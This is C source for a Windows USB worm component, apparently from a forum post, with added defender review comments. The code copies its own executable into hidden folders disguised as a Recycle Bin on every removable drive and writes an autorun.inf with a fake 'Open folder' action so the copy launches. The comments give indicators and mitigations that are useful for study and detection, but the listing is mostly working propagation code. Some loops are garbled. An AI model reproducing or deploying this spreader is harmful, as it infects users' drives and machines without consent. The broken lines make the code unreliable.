/*
 * Review notes (defender's reading of the listing).
 *
 * The code polls for removable drives and, on each one, writes a copy of the
 * running executable plus an autorun.inf that points at that copy.
 * Artifacts that follow directly from the constants below:
 *   - <drive>\TTHDHGC\DFG-2352-66235-2352322-634621321-6662355\
 *     (hidden + read-only + system), holding Desktop.ini and 364855.exe
 *   - <drive>\autorun.inf (hidden + system + read-only)
 * The literal names are compile-time strings and are indicators for this
 * listing only. More durable signals are a process creating autorun.inf at
 * the root of a removable volume, and an executable inside a hidden+system
 * directory whose Desktop.ini carries the Recycle Bin CLSID.
 * Disabling AutoRun for removable media (NoDriveTypeAutoRun policy) removes
 * the launch path the autorun.inf depends on; Windows 7 and later do not
 * honour these autorun.inf launch entries on USB mass storage by default.
 */
#include "includes.h"
#include "externs.h"

#define USBSLEEPTIME 20000 /* passed to Sleep(): 20000 ms between drive scans */
#define USB_STR_RECYCLER "\\TTHDHGC"
#define USB_STR_REC_SUBDIR "\\DFG-2352-66235-2352322-634621321-6662355"
/* {645FF040-5081-101B-9F08-00AA002F954E} is the shell CLSID of the Recycle Bin. */
#define USB_STR_DESKTOP_DATA "[.ShellClassInfo]\r\nCLSID={645FF040-5081-101B-9F08-00AA002F954E}"
#define USB_STR_DESKTOP_INI "\\Desktop.ini"
#define USB_STR_AUTORUN_INF "\\autorun.inf"
#define USB_STR_AUTORUN_DATA1 "[autorun]\r\nopen="
/* The action text reads like Explorer's own AutoPlay entry; the icon index is
 * presumably a folder icon (not verifiable from the listing). */
#define USB_STR_AUTORUN_DATA2 "\r\nicon=%SystemRoot%\\system32\\SHELL32.dll,4\r\naction=Open folder to view files \r\nshell\\open\\command="
#define USB_STR_AUTORUN_DATA3 "\r\nshell\\open\\default=1"
#define USB_STR_FILENAME "364855.exe"

/*
 * Writes the directory, Desktop.ini, executable copy and autorun.inf onto
 * one drive.
 *
 * drv: drive prefix; the caller in this listing passes "<letter>:".
 * Returns FALSE when a directory or file cannot be created or written,
 * otherwise the result of the CopyFile call.
 */
BOOL USB_InfectDrive(char *drv)
{
    char szFile[514] = {0}, szTemp[514] = {0}, *p; //128 = IRCLINE?
    int i;
    BOOL ret;
    HANDLE f;
    DWORD d;

    // create RECYCLER
    // Both directory levels are marked hidden + read-only + system, so they
    // are not shown under Explorer's default view settings.
    lstrcat(szFile, drv);
    lstrcat(szFile, USB_STR_RECYCLER);
    if (!CreateDirectory(szFile, NULL) && GetLastError() != ERROR_ALREADY_EXISTS)
        return FALSE;
    SetFileAttributes(szFile, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_SYSTEM);
    lstrcat(szFile, USB_STR_REC_SUBDIR);
    if (!CreateDirectory(szFile, NULL) && GetLastError() != ERROR_ALREADY_EXISTS)
        return FALSE;
    SetFileAttributes(szFile, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_SYSTEM);

    // create Desktop.ini
    // The Desktop.ini content is the [.ShellClassInfo] section with the
    // Recycle Bin CLSID defined above.
    lstrcat(szFile, USB_STR_DESKTOP_INI);
    f = CreateFile(szFile, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM, 0);
    if (f < (HANDLE)1)
        return FALSE;
    if (!WriteFile(f, USB_STR_DESKTOP_DATA, sizeof(USB_STR_DESKTOP_DATA) - 1, &d, NULL)) {
        CloseHandle(f);
        return FALSE;
    }
    CloseHandle(f);

    // copy .exe file
    // The path is cut back to the directory and the fixed file name is
    // appended; the source is the image of the current process.
    p = szFile + lstrlen(szFile);
    while (p[0] != '\\')
        p--;
    p++;
    *p = 0;
    lstrcat(szFile, USB_STR_FILENAME);
    GetModuleFileName(0, szTemp, sizeof(szTemp)-1);
    ret = CopyFile(szTemp, szFile, TRUE); // TRUE: fails if the file already exists
    // todo: add crc or md5 check for file
    SetFileAttributes(szFile, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_SYSTEM);

    // create autorun.inf data
    // NOTE(review): the loop body below appears garbled in the page as
    // captured; it is left unchanged.
    for (i = 0; i < sizeof(szTemp); i++)
        szTemp = 0;
    // p is moved past the first backslash, so the autorun.inf entries hold
    // the drive-relative path of the copied executable.
    p = szFile;
    while (p[0] != '\\')
        p++;
    p++;
    lstrcat(szTemp, USB_STR_AUTORUN_DATA1);
    lstrcat(szTemp, p);
    lstrcat(szTemp, USB_STR_AUTORUN_DATA2);
    lstrcat(szTemp, p);
    lstrcat(szTemp, USB_STR_AUTORUN_DATA3);

    // create autorun.inf file
    // NOTE(review): same garbling as above; left unchanged.
    for (i = 0; i < sizeof(szFile); i++)
        szFile = 0;
    lstrcat(szFile, drv);
    lstrcat(szFile, USB_STR_AUTORUN_INF);
    // Attributes of any existing autorun.inf are reset, then the file is
    // replaced (CREATE_ALWAYS). A legitimate autorun.inf on the drive is
    // therefore overwritten, which is itself a visible change for integrity
    // monitoring.
    SetFileAttributes(szFile, FILE_ATTRIBUTE_NORMAL);
    f = CreateFile(szFile, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_READONLY, 0);
    if (f < (HANDLE)1)
        return FALSE;
    if (!WriteFile(f, szTemp, lstrlen(szTemp), &d, NULL)) {
        CloseHandle(f);
        return FALSE;
    }
    CloseHandle(f);
    return ret;
}

/*
 * Thread entry point that repeats the drive scan.
 *
 * param: cast to NTHREAD * (type not shown on the page); not used in the
 *        visible body.
 * Each pass sleeps USBSLEEPTIME, enumerates drive strings, skips letters
 * A/B (65, 66, 97, 98 are 'A', 'B', 'a', 'b') and calls USB_InfectDrive only
 * for drives reported as DRIVE_REMOVABLE.
 */
DWORD WINAPI USB_Spreader(LPVOID param)
{
    NTHREAD *usbs = (NTHREAD *)param;
    char szTemp[514] = {0};
    char szDrive[3];
    char *p;

    szDrive[0] = ' ';
    szDrive[1] = ':';
    szDrive[2] = 0;
    // NOTE(review): the loop header below is incomplete in the page as
    // captured; it is left unchanged.
    for ( {
        Sleep(USBSLEEPTIME);
        if (GetLogicalDriveStrings(514 - 1, szTemp)) {
            p = szTemp;
            do {
                *szDrive = *p;
                if (szDrive[0] != 65 && szDrive[0] != 66 && szDrive[0] != 97 && szDrive[0] != 98) {
                    if (GetDriveType(szDrive) == DRIVE_REMOVABLE) {
                        if (USB_InfectDrive(szDrive)) { }
                    }
                }
                // advance past the terminator of the current drive string
                while (*p++);
            } while (*p);
        }
    }
}

externs.h:
/* Thread entry points; only USB_Spreader is defined in this listing. */
DWORD WINAPI USB_Spreader(LPVOID param);
DWORD WINAPI view(LPVOID param);
DWORD WINAPI cHTTP(LPVOID param);

includes.h:
#define _WIN32_WINNT 0x0403 // Very important for critical sections.
#define WIN32_LEAN_AND_MEAN // Good to use.
#pragma optimize("gsy", on) // Global optimization, Short sequences, Frame pointers.
#pragma comment(linker, "/opt:nowin98")
#pragma comment(linker, "/ALIGN:4096") // This will save you some size on the executable.
#pragma comment(linker, "/IGNORE:4108 ") // This is only here for when you use /ALIGN:4096.
//default headers
#include <windows.h>
#include <stdio.h>
#include <string.h>
#include <winsock2.h>
#include <time.h>
#include <stdlib.h>
#include <Winsvc.h>
#include <winuser.h>
#include <wininet.h>
#include <winable.h>
#include <tlhelp32.h>
#include <tchar.h>
#include <shlobj.h>
#include <shlwapi.h>
#include <shellapi.h>
#include <tlhelp32.h>
#pragma comment(lib, "Ws2_32.lib")
#pragma comment(lib, "shlwapi.lib")
#pragma comment(lib, "urlmon.lib")
#pragma comment(lib, "shell32.lib")

Sursa de inspiratie.